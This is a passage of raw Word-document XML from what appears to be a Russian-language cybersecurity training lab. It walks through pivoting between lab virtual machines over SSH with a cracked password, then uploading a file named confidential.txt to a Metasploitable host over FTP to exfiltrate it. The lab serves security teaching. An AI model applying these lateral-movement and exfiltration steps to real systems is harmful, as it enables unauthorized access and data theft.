      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07582CA2" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PING 192.168.0.11 (192.168.0.11) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB50529" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">64 bytes from 192.168.0.11: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>icmp_seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=64 time=0.606 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2793EC95" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">64 bytes from 192.168.0.11: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>icmp_seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=64 time=0.262 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70E7DF2D" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A69B364" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--- 192.168.0.11 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413C87D" w14:textId="6E3BC9B9" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 packets transmitted,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>received, 0% packet loss, time 999ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FF2FFC" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> min/avg/max/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0.262/0.434/0.606/0.172 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39E0C8D0" w14:textId="05581219" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBAE9C1" w14:textId="33A059F3" w:rsidR="00C43A3B" w:rsidRPr="008855F4" w:rsidRDefault="00C43A3B" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43A3B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29A78663" wp14:editId="1A710FF2">
            <wp:extent cx="6400800" cy="3649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5505" w14:textId="6C64C06F" w:rsidR="00A258CE" w:rsidRDefault="00E60D5A" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Только адреса 192.168.0.1 (Security Onion eth0)</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.0.11 (виртуальная машина CyberOps Workstation) отвечают на эхозапросы. Установите сеанс SSH</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">виртуальной машиной CyberOps Workstation. Введите </w:t>
      </w:r>
      <w:r w:rsidR="003B54AC" w:rsidRPr="00F27B94">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (да), чтобы принять цифровую подпись RSA при первом подключении.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">качестве пароля введите </w:t>
      </w:r>
      <w:r w:rsidR="00A258CE" w:rsidRPr="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF6049" w14:textId="3B239A8E" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyst@SecOnion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED05A3" w14:textId="357631D4" w:rsidR="005E42B1" w:rsidRDefault="005E42B1" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E42B1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12626F28" wp14:editId="50987DBA">
            <wp:extent cx="6400800" cy="13963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5566" w14:textId="61DCCCBF" w:rsidR="006E57ED" w:rsidRDefault="00E60D5A" w:rsidP="006E57ED">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Извлечение конфиденциального файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2B2D41" w14:textId="2F4AC328" w:rsidR="00AC03E3" w:rsidRPr="0042041D" w:rsidRDefault="00A258CE" w:rsidP="00AC03E3">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Теперь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> у </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>вас есть доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>виртуальной машине CyberOps Workstation через ряд сеансов SSH (ВМ Kali &gt; ВМ Security Onion &gt; ВМ CyberOps Workstation)</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>помощью пароля, который был взломан на предыдущем шаге. Теперь вы получите доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>конфиденциальному файлу</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>извлечете его содержимое.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0CC7E7" w14:textId="654D6E94" w:rsidR="007A397A" w:rsidRDefault="00AF0F0A" w:rsidP="00AF0F0A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Убедитесь, что вы находитесь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">главном каталоге пользователя analyst. Измените текущий каталог на </w:t>
      </w:r>
      <w:r w:rsidR="007A397A" w:rsidRPr="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lab.support.files</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D9CC5" w14:textId="227D53FD" w:rsidR="00A015BB" w:rsidRDefault="00A015BB" w:rsidP="00A015BB">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>@secOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~]$ </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lab.support.files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D0BE042" w14:textId="6A8DBB7A" w:rsidR="005E42B1" w:rsidRPr="008855F4" w:rsidRDefault="005E42B1" w:rsidP="00A015BB">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E42B1">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A5E21DE" wp14:editId="17C36B76">
            <wp:extent cx="6400800" cy="868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FFB7" w14:textId="7336C9A8" w:rsidR="00AF0F0A" w:rsidRDefault="00AF0F0A" w:rsidP="00AF0F0A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Выведите список файлов, находящихся</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">этом каталоге. Убедитесь, что файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>confidential.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> присутствует</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>этой папке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1385FAA2" w14:textId="0F1069E8" w:rsidR="00AF0F0A" w:rsidRDefault="00AF0F0A" w:rsidP="00AF0F0A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Установите сеанс FTP</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">виртуальной машиной Metasploitable. Используйте пользователя по умолчанию </w:t>
      </w:r>
      <w:r w:rsidR="00535198">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">analyst </w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> а </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в качестве пароля введите </w:t>
      </w:r>
      <w:r w:rsidR="00266168">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ECC297" w14:textId="1CDE7FA9" w:rsidR="00AF0F0A" w:rsidRPr="008855F4" w:rsidRDefault="00AF0F0A" w:rsidP="00AF0F0A">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>@secOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lab.support.files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">]$ </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ftp 209.165.200.235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1D500" w14:textId="77777777" w:rsidR="00AF0F0A" w:rsidRPr="008855F4" w:rsidRDefault="00AF0F0A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connected to 209.165.200.235.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685390A" w14:textId="77777777" w:rsidR="00AF0F0A" w:rsidRPr="008855F4" w:rsidRDefault="00AF0F0A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>220 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEA1EE1" w14:textId="65308F19" w:rsidR="00AF0F0A" w:rsidRPr="008855F4" w:rsidRDefault="00AF0F0A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Name (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>209.165.200.235:analyst</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r w:rsidR="00E60D5A" w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AF8D76" w14:textId="77777777" w:rsidR="00AF0F0A" w:rsidRPr="008855F4" w:rsidRDefault="00AF0F0A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D294C1" w14:textId="77777777" w:rsidR="00AF0F0A" w:rsidRPr="00D12943" w:rsidRDefault="00AF0F0A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Пароль</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12943">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB21F7A" w14:textId="0BB26F7F" w:rsidR="0073224A" w:rsidRDefault="00AF0F0A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A703F8F" w14:textId="336ACE48" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>Тип удаленной системы — UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23786611" w14:textId="5E84C9BB" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>Для передачи файлов используется двоичный режим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C0299" w14:textId="1EDF8272" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>ftp&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E541697" w14:textId="092CF259" w:rsidR="00F564ED" w:rsidRDefault="00F564ED" w:rsidP="00F564ED">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выгрузите файл </w:t>
      </w:r>
      <w:r w:rsidRPr="003E2E90">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>confidential.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на виртуальную машину Metasplolitable. Теперь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> у </w:t>
      </w:r>
      <w:r>
        <w:t>вас есть доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>этому файлу,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>вы можете переместить его на виртуальную машину Kali</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">использовать так, как вам нужно. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF37DFA" w14:textId="77777777" w:rsidR="00F564ED" w:rsidRPr="008855F4" w:rsidRDefault="00F564ED" w:rsidP="00F564ED">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">put confidential.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A34BD39" w14:textId="77777777" w:rsidR="00F564ED" w:rsidRPr="008855F4" w:rsidRDefault="00F564ED" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200 PORT command successful. Consider using PASV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BE408" w14:textId="77777777" w:rsidR="00F564ED" w:rsidRPr="008855F4" w:rsidRDefault="00F564ED" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>150 Ok to send data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E780D2E" w14:textId="77777777" w:rsidR="00F564ED" w:rsidRPr="008855F4" w:rsidRDefault="00F564ED" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E645D" w14:textId="58B9868A" w:rsidR="00F564ED" w:rsidRPr="008855F4" w:rsidRDefault="00BA15E1" w:rsidP="006513FD">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">103 bytes sent in 0.000104 seconds (41.6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
